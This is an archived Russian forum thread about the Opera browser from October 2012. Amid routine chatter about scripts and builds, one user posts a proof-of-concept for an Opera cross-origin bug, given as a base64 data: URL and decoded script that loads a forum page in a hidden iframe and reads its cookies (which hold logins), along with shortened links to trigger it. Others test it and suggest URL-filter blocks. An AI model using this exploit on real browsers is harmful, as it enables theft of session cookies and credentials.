Ru-Board.club
← Вернуться в раздел «Программы»

» Opera (часть 22)

Автор: Gimmor
Дата сообщения: 05.10.2012 14:42

Цитата:
проще здесь отписаться "Что и как?"

Ага, отпишешься тут - потом опять накинутся, как вчера.
Оно мне надо?
Тем более, схема пока полностью мной не доработана. Бросил на полпути. Работает - и ладно. Нет времени на углубленный разбор.
Я предлагал людям вместе подумать над этим, никто не откликнулся.
Значит так "нужно..."
А кому просто интересно, должен знать, что оперными средствами это не достижимо. Только копаясь в Винде. (Чем я и возмущался вчера в сравнении с FF) Что к данной ветке форума не имеет ровным счетом никакого отношения.
Одно дело - обозначить такую возможность, другое - уходить с головой в Винду...
Автор: omamont
Дата сообщения: 05.10.2012 18:42
google-translate.js для 12.02... есть рабочий? скиньте плиз.
Автор: nicol51
Дата сообщения: 05.10.2012 19:14
omamont
google-translate.js
Автор: BennyBlanco
Дата сообщения: 05.10.2012 21:03
nicol51
Этот шустренький, как и раньше в отличие от этого с "офф. сайта"
И где вы его нарыли, если на "офф. сайте" версия 1.7.6?
Автор: nicol51
Дата сообщения: 05.10.2012 21:07
BennyBlanco
Сейчас и не вспомню. Когда-то с Lex1 обсуждалась работа скрипта и он выкладывал его новые варианты.
Автор: omamont
Дата сообщения: 05.10.2012 21:20
sis_terr 19:09 05-10-2012
Цитата:
Поставила

вам сюды..

nicol51 спасибо.
Автор: Gena1971
Дата сообщения: 05.10.2012 21:28
А чего в шапке еще 12.10.1615? Вроде уже со вчера 1618 есть.
Автор: WatsonRus
Дата сообщения: 05.10.2012 21:37
1615 это официальная бета, выложенная в т.ч. и на FTP, 1618 обычный снапшот.
Автор: SAT31
Дата сообщения: 05.10.2012 21:57
Да просто шапку не обновил, а другие этого не делают, видимо
Снэпшоты тоже вставляли, все же некст. Но я сейчас со смарта, так что, пусть обновит другой кто-нибудь.
--------
upd: сделал сам
Автор: kvazigorynich
Дата сообщения: 06.10.2012 11:03
Ну, вот начали появляться детали по-поводу слухов об неких уязвимостях. Теперь это уже не слухи.

https://rdot.org/forum/showthread.php?t=2444
Автор: DrakonHaSh
Дата сообщения: 06.10.2012 11:21
хи, хи, опероводы, кликаем по ссылке и наблюдаем свои куки (в т.ч. логин и пароль) от руборды
http://tinyurl.com/8nphb4d
(ссылка на описание и метод эксплуатации баги в сообщении от kvazigorynich выше)

Добавлено:
ссылка безопасна, в ней исполняентся alert(document.frames[0].document.cookie);
но злым товаришчам не что не мешает вставить по такому же принципу отправку ваших кук к себе на злой сервер

подробнее:
http://preview.tinyurl.com/8nphb4d
=>
data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWV
udC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24u
cmVsb2FkKCk7ZnVuY3Rpb24gYSgpe2FsZXJ0KGRvY3VtZ
W50LmZyYW1lc1swXS5kb2N1bWVudC5jb29raWUpfWZ1bm
N0aW9uIGIoKXt2YXIgaT1kb2N1bWVudC5jcmVhdGVFbGV
tZW50KCdpZnJhbWUnKTtpLnN0eWxlPSd3aWR0aDowcHg7
aGVpZ2h0OjBweDt2aXNpYmlsaXR5OmhpZGRlbic7aS5zc
mMgPSAnaHR0cCc7aS5zcmMrPWRvY3VtZW50LnJlZmVycm
VyLmxlbmd0aD8nJzoncyc7aS5zcmMrPSc6Ly9mb3J1bS5
ydS1ib2FyZC5jb20vYm9hcmQvYm9hcmQuY3NzJztpLm9u
bG9hZD1mdW5jdGlvbigpe2EoKX07ZG9jdW1lbnQuYm9ke
S5hcHBlbmRDaGlsZChpKX08L3NjcmlwdD48Ym9keSBvbm
xvYWQ9YigpPg==
=>
<script>if(document.domain=='tinyurl.com')location.reload();function a(){alert(document.frames[0].document.cookie)}function b(){var i=document.createElement('iframe');i.style='width:0px;height:0px;visibility:hidden';i.src = 'http';i.src+=document.referrer.length?'':'s';i.src+='://forum.ru-board.com/board/board.css';i.onload=function(){a()};document.body.appendChild(i)}</script><body onload=b()>
=>
Код: <script>
if (document.domain == 'tinyurl.com') location.reload();

function a() {
alert(document.frames[0].document.cookie)
}

function b() {
var i = document.createElement('iframe');
i.style = 'width:0px;height:0px;visibility:hidden';
i.src = 'http';
i.src += document.referrer.length ? '' : 's';
i.src += '://forum.ru-board.com/board/board.css';
i.onload = function () {
a()
};
document.body.appendChild(i)
}
</script>
<body onload=b()>
Автор: amr_now
Дата сообщения: 06.10.2012 11:27
Трудовые будни пиарщика - бейсбольная бита и взятки.

IlyaShpankov
Модератор
Сообщения: 3850

Originally posted by Merser:
глянули DSK-374373

Пока комментариев нет. Я подключил нужных людей напрямую.

И это вместо перевода сообщений об ошибках и помощи в грамотном составлении баг-репортов...
Автор: sis_terr
Дата сообщения: 06.10.2012 12:58

Цитата:
кликаем по ссылке и наблюдаем свои куки

что то у меня не работает(
Автор: xChe
Дата сообщения: 06.10.2012 13:03

Цитата:
кликаем по ссылке и наблюдаем свои куки

У меня тоже что-то нифига...
12.10 - просит принять ssl сертификат от РуБорда и на этом всё, а 11.01 просто начинает тупить пожирая память и не даёт никакого результата.
Автор: DrakonHaSh
Дата сообщения: 06.10.2012 13:10
xChe, sis_terr
хиба у вас передача referrer-а отключена [у xChe в 12.10 100%]
нате вам такой вариант: http://tinyurl.com/9xahux3
на ссылку нужно кликать, а не, например, открывать в новой/фоновой вкладке
ну и не все абсолютно версии уязвимы наверное, есть и ограничения у метода, как и у любого другого

Кстати, использование сторонних сервисов вроде tinyurl не является обязателеным условием

ps ссылки безопасны - только вывод alert(document.frames[0].document.cookie);
Автор: xChe
Дата сообщения: 06.10.2012 14:31
DrakonHaSh

Цитата:
на ссылку нужно кликать, а не, например, открывать в новой/фоновой вкладке

Ага, так работает в 12.10 Прикольно. А на 11.01 похоже не действует.

ЗЫ: Ещё один довод в пользу того, чтобы не включать javascript без необходимости.
Автор: sis_terr
Дата сообщения: 06.10.2012 16:31
при клике открывается новая вкладка, с каким то страшной абракадаброй окошко,
говоришь ему окей , оно исчезает и остаётся пустое поле
Автор: SAT31
Дата сообщения: 06.10.2012 16:36
sis_terr
а есть скрин абракадабры?
Автор: adasiko
Дата сообщения: 06.10.2012 16:39

Цитата:
при клике открывается новая вкладка, с каким то страшной абракадаброй окошко

ради этой абракадабры по несколько часов бывает сидишь, чтоб придумать как фильтр обойти
Автор: petrik70
Дата сообщения: 06.10.2012 16:44

Цитата:
а есть скрин абракадабры?


Автор: kvazigorynich
Дата сообщения: 06.10.2012 16:48
Что для одного абракадабра, для другого ключи от квартиры
Автор: SAT31
Дата сообщения: 06.10.2012 16:52
тьфу, речь все про это. Тогда конечно, скрин не нужен
Автор: kvazigorynich
Дата сообщения: 06.10.2012 17:01
Как думаете если в фильтры для блокировки добавить что-то типа *base64* или *data:*, как временная мера прокатит?

Правда возможно это еще не все.
Автор: xChe
Дата сообщения: 06.10.2012 17:11

Цитата:
в фильтры для блокировки добавить что-то типа *base64* или *data:*

От прямой ссылки прокатит наверное, но от пропущенной через перенаправлялку типа tinyurl.com не спасёт.
По крайней мере AdMuncher не помогает - пробовал.
Автор: adasiko
Дата сообщения: 06.10.2012 17:18
Так в чем прооблема? отключить referrer login и увсе
Хотя пейпал работать не будет наверно
Автор: kvazigorynich
Дата сообщения: 06.10.2012 17:21
xChe

А какая разница? Ресурс в любом случае не должен подгрузиться если его адрес попадает под действие фильтра. Если в urlfilter кинуть *base64*, то ни один адрес содержащий base64 оперой обрабатываться не будет. У меня опера блочит такой адрес. Кроме base64 там наверняка какие-то еще варианты есть. Я *data:* добавил. Возможно есть какие-то подводные камни. Я в этом не слишком понимаю.
Автор: xChe
Дата сообщения: 06.10.2012 17:34
kvazigorynich

Цитата:
Если в urlfilter кинуть *base64*, то ни один адрес содержащий base64 оперой обрабатываться не будет. У меня опера блочит такой адрес.

У меня - нифига.

adasiko
Отключение referrer тоже не катит.
Автор: DrakonHaSh
Дата сообщения: 06.10.2012 17:43
adasiko

Цитата:
Так в чем прооблема? отключить referrer login и увсе

и с отключенным referrer работает. это первый вариант, что я накатал, по полной аналогии с кодом открывателя баги M_script, без referrer не работал.

я бы пока порекомендовал пользоваться другим браузером (или старыми ветками, не подверженными баге)
мало ли сейчас напридумывают приватных методов эксплуатации этой баги.
всяких аккаунтов от почт, социалок и прочей хрени, уверен, с помощью этой баги уже наворовали и еще наворуют дофигище - этж просто Подарок какой-то для кибер-мошенников
Автор: LEX1
Дата сообщения: 06.10.2012 17:48
DrakonHaSh
Немного статистики по антиквариату: 9.27 - не работает: message: "Security error: attempted to read protected variable", 9.64 - работает, ну и 12.10 тоже как уже сказали.

BennyBlanco 22:03 05-10-2012
Цитата:
Этот шустренький, как и раньше в отличие от этого с "офф. сайта"

Используется другой прокси сервер (webwarper.net). Насколько я помню, он мне чем-то не понравился, так что я перебирал другие варианты и в итоге так ни на чём и не остановился...
Автор: claim35
Дата сообщения: 06.10.2012 17:50

Цитата:
Подарок какой-то для кибер-мошенников

Интересно, а вообще много ли есть ещё таких уникальных ресурсов, как руборд, которые логин и пароль в незашифрованном виде держат в куках?

Страницы: 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210

Предыдущая тема: Проблемы при открытии презентации в PowerPoint 2010

Форум Ru-Board.club — поднят 15-09-2016 числа. Цель - сохранить наследие старого Ru-Board, истории становления российского интернета. Сделано для людей.